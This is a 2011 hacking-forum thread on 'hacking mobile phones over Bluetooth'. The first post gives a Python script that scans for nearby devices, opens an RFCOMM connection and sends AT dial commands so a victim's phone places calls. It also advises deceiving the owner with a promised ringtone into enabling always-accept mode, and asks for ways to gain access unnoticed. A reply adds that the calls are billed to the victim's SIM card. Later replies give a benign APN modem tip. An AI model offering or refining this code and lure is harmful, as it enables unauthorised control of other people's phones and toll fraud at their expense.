Author Topic: hacking mobile phone over Bluetooth  (Read 12763 times)

0 Members and 1 Guest are viewing this topic.

Offline drago

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
  • programmer in python....
    • View Profile
hacking mobile phone over Bluetooth
« on: November 10, 2011, 02:24:19 pm »

hacking mobile phone over Bluetooth is quit a heavy task.


three things are needed for it.
  • knowledge about Bluetooth network.
  • A series of AT commands on which the radio network work.
  • how to get control over the phone....


i am a python programmer so the program i will show over python.

but first thing first i.e to know how bluetooth network work.
for this you can visit ove link http://electronics.howstuffworks.com/bluetooth2.htm

secondly knowin AT command on which radio network work.This can
be found on the NET or you can download and read the book
Telit_AT_Commands_Reference_Guide from the link
http://www.grupoitech.com.br/controle/enviadas/download/wireless/telit-atcommandsreferenceguider1220110919112643.pdf


here is a simple python program to make a call from mobile device

from your pc.

from bluetooth import *
near=discover_devices()
print near
count=0
for s in near:
    print count+1,":",lookup_name(s)
    count=count+1
n=int(input("choose your device index"))
c=BluetoothSocket(RFCOMM)
c.connect((near[n-1],1))
while(1):
    str=raw_input("number you want to call")
    str="ATD +91"+str+";\r"
    c.send(str)
    print c.recv(100)
    print c.recv(100)
    print c.recv(100)


this program is run with python 2.6 interpreater and
bluz extention

the last about gaining access.Actually I have not found
any method to gain the access with out user notice. The
best thing i do is i promise the user of phone to give
a good ringtone or something like that and turn on always acceses
mode.

if any one knows any beter way to gain access without notice
then please inform me soon.Oviously we can do many more
only you need to know more of those AT commands and their
uses...
dd

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: hacking mobile phone over Bluetooth
« Reply #1 on: November 10, 2011, 03:33:45 pm »
Not sure what was the point of this. Looks like semi-tutorial'ish post :P
But I would like to know as well how can Bluetooth be exploited on newer phones.

Offline iAmLuFFy

  • Knight
  • **
  • Posts: 226
  • Cookies: 6
  • i aM MoDiFiEr nOt A cReAtOr
    • View Profile
Re: hacking mobile phone over Bluetooth
« Reply #2 on: November 10, 2011, 04:07:16 pm »
i have used some software for bluetooth hack, but every one of them also require authentication from victim phone.
 
but once you get it you are all good to go then. every thing will be in your control,
even if you call from your phone, balance will be deducted from his/her sim card. :D
 
not axactly you are calling from your phone, but you are using victim mobile to call over bluetooth.
 
 
don't know that much about AT command.
 
but, i always have to use it when i try to connect internet on lapto using my samsung mobile.
 
i have to type this command
Code: [Select]
AT+CGDCONT=1,"IP","APN NAME"
 
this command just use given apn directly insted of looking in your mobile profile.
iAmLuFFy

Offline iAmLuFFy

  • Knight
  • **
  • Posts: 226
  • Cookies: 6
  • i aM MoDiFiEr nOt A cReAtOr
    • View Profile
Re: hacking mobile phone over Bluetooth
« Reply #3 on: November 10, 2011, 04:35:41 pm »
well, this reminds me to share some thing.
 
If any body using internet via GPRS.
 
and if you are getting error of ppp link control,
 
then you can try giving this command
Code: [Select]

 AT+CGDCONT=1,"IP","APN NAME"

in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
 
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
 
look at refrence pic as i am using it in my laptop.
 
iAmLuFFy

Offline FuyuKitsune

  • Knight
  • **
  • Posts: 292
  • Cookies: 21
    • View Profile
Re: hacking mobile phone over Bluetooth
« Reply #4 on: November 11, 2011, 01:49:09 am »
I don't know about the AT command, thanks for the command reference. The Python is helpful too.


Code: [Select]

 AT+CGDCONT=1,"IP","APN NAME"

in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
 
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
That is sweet :) I'll definitely have to learn how to use AT

Offline drago

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
  • programmer in python....
    • View Profile
Re: hacking mobile phone over Bluetooth
« Reply #5 on: November 11, 2011, 02:04:28 am »
Not sure what was the point of this. Looks like semi-tutorial'ish post :P
But I would like to know as well how can Bluetooth be exploited on newer phones.






i am new in this field and site don't what we need to post i have shared only the information i had and the way i have programed to hack mobile....
dd

Offline drago

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
  • programmer in python....
    • View Profile
Re: hacking mobile phone over Bluetooth
« Reply #6 on: November 11, 2011, 02:25:34 am »

well, this reminds me to share some thing.
 
If any body using internet via GPRS.
 
and if you are getting error of ppp link control,
 
then you can try giving this command
Code: [Select]

 AT+CGDCONT=1,"IP","APN NAME"

 
in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
 
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
 
look at refrence pic as i am using it in my laptop.
 




thanks for the piece of information. ya this is an AT command
AT+CGDCONT is GPRS command for defining Packet Data Protocol(PDP) context
dd